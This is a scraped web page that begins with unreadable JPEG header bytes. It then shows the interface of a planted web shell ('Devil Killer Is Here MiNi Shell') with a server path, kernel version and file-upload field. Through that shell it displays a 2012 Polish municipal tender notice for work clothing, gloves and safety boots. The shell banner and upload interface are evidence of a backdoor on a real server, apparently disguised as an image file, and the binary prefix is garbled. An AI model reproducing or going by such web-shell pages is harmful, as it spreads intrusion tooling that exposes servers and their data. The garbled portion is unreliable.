JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121205/257635-N-2012.html

<p class="kh_header"><b>Zielona Góra: Dostawa ubrań roboczych, rękawic, butów</b><br>
<b>Numer ogłoszenia: 257635 - 2012; data zamieszczenia: 05.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Komunalnej i Mieszkaniowej , Aleja Zjednoczenia 110, 65-005 Zielona Góra, woj. lubuskie, tel. (068) 322-91-86, faks (068) 322-91-84.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgkim.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa ubrań roboczych, rękawic, butów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa odzieży roboczej, rękawic oraz butów zgodnie z poniższym opisem:

A)Część I - zadanie 1 - dostawa odzieży roboczej
 
1.  UBRANIE LETNIE      kolor czerwony - 340  kpl 
Logo ZGKiM na sercu (kieszonka), na plecach i na bawecie (kieszonka)
Tkanina poliestrowo bawełniana (35/65) czyli skład ( bawełna 35%+poliester 65%) , gramatura: 245g/m2

BLUZA - zapinana na guziki w kolorze czerwonym kryte listwą, na plecach zakładki regulujące tęgość, w pasie guma regulująca tęgość szer. 5cm, rękawy wydłużone od PN o 4cm, na rękawach podwójna taśma odblaskowa zgodna z normą PN-EN 471-CIOP nr 342/2003 - zgodnie z deklaracją zgodności producenta, mankiet zapinany na guzik, z przodu odcinany karczek podkreślony niebieską wypustką, u góry dwie kieszenie naszywane z patkami zapinanymi na springi.
SPODNIE OGRODNICZKI - rozporek zapinany na guziki w kolorze czerwonym, regulacja tęgości w pasie lewy bok na guziki i guma z tyłu, regulacja tęgości nogawki u dołu na guziki, na prawej nogawce calówka, z przodu dwie naszywane kieszenie z ozdobnymi niebieskimi lamówkami, odcinany bawet podkreślony niebieską wypustką, na bawecie kieszeń zapinana na zamek,  w szelkach żakardowa taśma szelkowa.
Minimalny okres gwarancji wynosi 12 miesięcy. Wymagana deklaracja zgodności.

2. UBRANIE OCIEPLANE        kolor czerwony - 70 kpl 
Logo ZGKiM na sercu i na plecach
Tkanina poliestrowo bawełniana (35/65) czyli skład ( bawełna 35%+poliester 65%) , gramatura: 245g/m2

BLUZA - zapinana na guziki w kolorze czerwonym kryte listwą, ocieplina pikówka 100g/m2, wewnątrz kurtki regulacja tęgości,  na rękawach podwójna taśma odblaskowa zgodna z normą PN-EN 471-CIOP nr 342/2003 - zgodnie z deklaracją zgodności producenta, wzmocnienia na łokciach, w mankiecie guma, z przodu odcinany karczek podkreślony niebieską wypustką, u dołu dwie kieszenie naszywane z ozdobną niebieską lamówką.
SPODNIE DO PASA - rozporek zapinany na guziki w kolorze czerwonym , ocieplina pikówka 100g/m2 , regulacja tęgości w pasie na guziki, wzmocnienie w kroku i na kolanach, na prawej nogawce calówka, z tyłu po prawej stronie naszywana kieszeń, z przodu dwie naszywane kieszenie z ozdobnymi niebieskimi lamówkami.
Minimalny okres gwarancji wynosi 36 miesięcy. Wymagana deklaracja zgodności.


3.   UBRANIE ROBOCZE GRANATOWE DLA MECHANIKÓW - 22 kpl
Logo ZGKiM na sercu (kieszonka), na plecach .
Tkanina poliestrowo bawełniana (35/65) czyli skład ( bawełna 35%+poliester 65%) , gramatura: 245g/m2
        
BLUZA zapinana na guziki kryte listwą , na plecach zakładki regulujące tęgość, w pasie guma regulująca tęgość szer. 5cm, na rękawach podwójna taśma odblaskowa zgodna z normą PN-EN 471-CIOP nr 342/2003  - zgodnie z deklaracją zgodności producenta, mankiet zapinany na guzik, na dole dwie naszywane kieszenie , u góry dwie kieszenie naszywane z patkami zapinanymi na springi.
SPODNIE DO PASA - rozporek zapinany na guziki ,regulacja tęgości w pasie na guziki, na prawej nogawce calówka , z tyłu po prawej stronie naszywana kieszeń, z przodu dwie naszywane kieszenie. 
Minimalny okres gwarancji wynosi 6 miesięcy. Wymagana deklaracja zgodności.

4.   UBRANIE ROBOCZE SPAWALNICZE - 6 kpl
Tkanina ks proban, 100% bawełna

BLUZA prosta, bez ściągaczy, zapinana na guziki kryte listwą, na sercu od wewnątrz naszywana kieszeń, u dołu po bokach dwie wpuszczane kieszenie.

SPODNIE DO PASA - rozporek zapinany na guziki, regulacja tęgości w pasie, z przodu dwie naszywane kieszenie, z boku prawej nogawki calówka.
Minimalny okres gwarancji wynosi 9 miesięcy. 

5.   KOSZULA FLANELOWA -  310 szt                    
100% bawełna, splot płócienny, wątek luźno skręcony. drukowana dwubarwnie. Zapinana na 6 guzików, na lewej piersi naszywana kieszeń. Rękawy zakończone mankietami zapinanymi na jeden guzik. Szwy wykończone overlockiem. Minimalny okres gwarancji wynosi 12 miesięcy.
6. KALESONY-250 p                      

z miękkiej bawełny, jednostronnie czesanej o podwójnym wątku luźno skręconym. Guma w pasie, bawełniane ściągacze w nogawkach. Szwy zakończone overlockiem. Minimalny okres gwarancji wynosi 12 miesięcy. Kolor szary lub niebieski.

7.   LEGGINSY DAMSKIE -22 szt.

z miękkiej bawełny, gramatura 160 , skład 92% bawełny , 8% lycra.
8.   T-SHIRT - 450 szt.          
100% bawełny półczesanej, 150g/m2, elastyczny ściągacz, taśma wzmacniająca na ramionach, boki bezszwowe, podwójne szwy. Logo ZGKiM na sercu. Minimalny okres gwarancji wynosi 12 miesięcy.
9. CZAPKA FIRMOWA                                                                                                                     
czapka z daszkiem, tkanina poliestrowo bawełniana (35/65), cztery otwory wentylacyjne, z tyłu plastikowa regulacja wielkości czapki. Minimalny okres gwarancji wynosi 12 miesięcy.
  -  kolor granatowy bez Loga Zakładu- 14 szt 
  -  kolor czerwony z Logo Zakładu z przodu-180 szt 


10.   CZAPKA ZIMOWA -60 szt                       
tkanina poliestrowo bawełniana (35/65), typu uszanka, z daszkiem, ocieplana, obszyta futerkiem, możliwość zapinania na napy u góry i dołu.  Logo Zakładu z przodu. Minimalny okres gwarancji wynosi 36 miesięcy.
11.  UBRANIE PRZECIWDESZCZOWE - 50 szt.
kurtka ? przeciwdeszczowa za zamek błyskawiczny oraz spodnie do pasa wykonane z tkaniny nylonowej , wewnątrz podgumowany. Wodoszczelne szwy, zapięcie na zamek błyskawiczny, kaptur chowany w kołnierzu - regulacja szerokości mankietu i nogawek poprzez plastikowe napy, dwie duże kieszenie pokryte plisą , dół kurtki ścigany  sznurkiem. Minimalny okres gwarancji wynosi 36 miesięcy.

12.  KURTKA OCIEPLANA - 15 szt.                        
z tkaniny poliestrowej powlekanej PCW w kolorze ciemnym . Zapinana na zamek błyskawiczny kryty plisą zapinaną na rzepy. Wyposażona  w kaptur chowany w stójce. Podszewka poliestowa pikowana. Możliwość odpięcia ocieplenia. Zalecana odporność mrozowa do -30 stopni Celsjusza. Minimalny okres gwarancji wynosi 36 miesięcy.
13.   FARTUCH  DLA SPRZĄTACZEK -7  szt.                                            
tkanina poliestrowo-bawełniana (65/35), gramatura: 245g/m2, zapinany na guziki kryte listwą, dwie dolne kieszenie naszywane, otwarte, dwie górne kieszenie naszywane z patkami zapinanymi na rzep, rękawy zakończone mankietami zapinanymi na guziki, z tyłu rozcięcie na długości ok. 30cm. Minimalny okres gwarancji wynosi 12 miesięcy.

14.  SKARPETY BAWAEŁNIANE MĘSKIE                                                                                                       -   zimowe kolor czarny lub ciemno stalowy -20 p.      
-   letnie kolor czarny lub ciemno stalowy- 15 p.


B) część II - zadanie 2 - dostawa rękawic roboczych

1.   RĄKAWICE typu DRELICHOWE ROBOCZE -800 par
rękawice drelichowe z podszewką, 100% bawełna, pikowane, CE kat.1

2.  RĘKAWICE NALEWANE -3500 par
rękawice z tkaniny bawełnianej, powleczonej w ? szorstkowatym lateksem, do lekkich i średnio  ciężkich prac. CE kat.1
      
3.   RĘKAWICE typu NAKRAPIANE NA DZIANINIE PCW -1200 par
rękawice bawełniane, dziane, nakrapiane pcw, do prostych i lekkich prac. CE kat.1 
Długość minimum 25 cm.
      
4.   REKAWICE OGRODNICZE -9000 par
rękawice bawełniane, powlekane gumą w części chwytnej, do prostych i lekkich prac.      
CE kat.1 . Długość minimum 25 cm.

5.   RĘKAWICE DRELICHOWE OCIEPLANE -700 par                                                                                                                        
rękawice z grubej dzianiny poliestrowej , szorstkowata powierzchnia wewnętrzna zapewniająca  skuteczną izolację cieplną. Przedłużony ściągacz gwarantujący dobra przyleganie do nadgarstka. Dłonica powlekana podwójną warstwą lateksu spienionego dla poprawy izolacji i chwytności. 
CE kat. 1.

6.   RĘKAWICE NITRYLOWE  typu  440Y -14000 par
rękawice z dzianiny bawełnianej, powlekane ? lekkim nitrylem. Do prac lekkich i średnich. 
CE kat.1

C) część III - zadanie 3 - dostawa obuwia roboczego
Obuwie spełniające normę PN-EN-ISO 20344:2007 a w szczególności:

1.  OBUWIE ZIMOWE    (dla elektromonterów) -10 par
Kategoria obuwia bezpiecznego S3,. Podnosek stalowy, odporne na przebicie, wierzch skóry naturalne, wodoodporne, wysokość powyżej stawu skokowego, odporne na niską temperaturę. Minimalny okres gwarancji wynosi 36 miesięcy.

2.   OBUWIE ZIMOWE   ( dla mechaników ) -10 par
Kategoria obuwia bezpiecznego S3,  Podnosek stalowy,  odporne na przebicie, wierzch skóry  
 naturalne, wodoodporne, wysokość powyżej stawu skokowego, odporne na niską temperaturę.  
Olejoodporne. Minimalny okres gwarancji wynosi 36  miesięcy.

3.   OBUWIE ZIMOWE  ( pozostałe ) -45 par
Kategoria obuwia bezpiecznego S3, Podnosek stalowy, odporne na przebicie, wierzch skóry 
naturalne, wodoodporne, wysokość powyżej stawu skokowego, odporne na niską temperaturę.  
Minimalny okres gwarancji wynosi 36 miesięcy.

4.    OBUWIE LETNIE ROBOCZE   (dla elektromonterów) -15 par
Kategoria obuwia bezpiecznego S3, Podnosek stalowy, odporne na przebicie, wierzch skóry  
naturalne, wodoodporne, wysokość powyżej stawu skokowego. Minimalny okres  gwarancji wynosi 12 miesięcy.

5.    OBUWIE LETNIE ROBOCZE  ( dla mechaników ) -20 par
Kategoria obuwia bezpiecznego S3, odporne na przebicie. Podnosek stalowy, wierzch skóry 
naturalne, wodoodporne, wysokość powyżej stawu skokowego. Olejoodporne. Minimalny okres 
gwarancji wynosi 12 miesięcy.

6.  OBUWIE LETNIE ROBOCZE ( pozostałe ) -200 par
Kategoria obuwia bezpiecznego S3, Podnosek stalowy, odporne na przebicie, wierzch skóry naturalne, wodoodporne, wysokość powyżej stawu skokowego.  Minimalny okres gwarancji 
wynosi 12 miesięcy.

7.   BUTY GUMOWE-90 par
 Buty robocze gumowe. Wysokość butów 37 cm. CE kat.2 EN 347-1 . Wzór 6187 .                                    
Minimalny okres gwarancji wynosi 12 miesięcy.


POZOSTAŁE WYMOGI:

1.   Dostawa sukcesywna w zależności od potrzeb zamawiającego w terminie :                                                 - do 14 dni kalendarzowych w przypadku odzieży roboczej ( poz. od 1 do 4 poszczególnego asortymentu) , 
- do 3 dni roboczych w przypadku pozostałej odzieży (poz. od 5 do 14 poszczególnego asortymentu), rękawic (poz. od 1 do 6 asortymentu) i obuwia (poz. od 1 do 7 asortymentu) 
od złożenia konkretnego zamówienia przez Zamawiającego, transportem Wykonawcy i na koszt Wykonawcy.
2.    Faktury asortymentowo-ilościowo-wartościowe należy wystawić zgodnie ze złożonym zamówieniem.
3.    Należność za dostarczony towar będzie regulowana w terminie 14 dni od dnia dostarczenia towaru do zamawiającego.
4.    Wykonawcy ubiegający się o udzielenie zamówienia muszą przedstawić wzory całych ubrań wskazanych w opisie przedmiotu zamówienia w poz. A.1, A.2., A.3. Wzory ubrań należy dołączyć do oferty, oraz wymagane deklaracje zgodności z normami wymaganymi przez Zamawiającego, lub z normami równoważnymi.
6.   Asortyment ilościowy może ulec zmniejszeniu do 10% . Wykonawcy nie przysługują z tego tytułu żadne roszczenia.

Zdjęcia ubrań - część III siwz.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 18.11.00.00-3, 18.14.00.00-2, 18.14.10.00-9, 18.22.32.00-0, 18.44.33.00-9, 18.83.00.00-6, 18.81.60.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 22 ust. 1 pkt 1 ustawy Pzp, Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie ze wzorem oświadczenia stanowiącym Załącznik do SIWZ (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
Ocena spełnienia przedstawionych powyżej warunków udziału w postępowaniu zostanie dokonana wg formuły: spełnia - nie spełnia. Z treści złożonych dokumentów lub oświadczeń musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie):
-w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy
- w tym okresie, wykonali:
o	W przypadku składania oferty na zadanie 1 - co najmniej 2 dostawy ubrań roboczych na kwotę w ramach każdej umowy min. 90 tyś. złotych
o	W przypadku składania oferty na zadanie 2 - co najmniej 2 dostawy rękawic roboczych na kwotę w ramach każdej umowy min. 40 tyś. złotych
o	W przypadku składania oferty na zadanie 3 - co najmniej 2 dostawy butów roboczych na kwotę w ramach każdej umowy min. 30 tyś. złotych
Ocena spełnienia przedstawionych powyżej warunków udziału w postępowaniu zostanie dokonana wg formuły: spełnia - nie spełnia. Z treści złożonych dokumentów lub oświadczeń musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 22 ust. 1 pkt 3 ustawy Pzp, Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie ze wzorem oświadczenia stanowiącym Załącznik do SIWZ (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
Ocena spełnienia przedstawionych powyżej warunków udziału w postępowaniu zostanie dokonana wg formuły: spełnia - nie spełnia. Z treści złożonych dokumentów lub oświadczeń musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 22 ust. 1 pkt 3 ustawy Pzp, Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie ze wzorem oświadczenia stanowiącym Załącznik do SIWZ (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
Ocena spełnienia przedstawionych powyżej warunków udziału w postępowaniu zostanie dokonana wg formuły: spełnia - nie spełnia. Z treści złożonych dokumentów lub oświadczeń musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 22 ust. 1 pkt 4 ustawy Pzp, Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie ze wzorem oświadczenia stanowiącym Załącznik do SIWZ (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
Ocena spełnienia przedstawionych powyżej warunków udziału w postępowaniu zostanie dokonana wg formuły: spełnia - nie spełnia. Z treści złożonych dokumentów lub oświadczeń musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
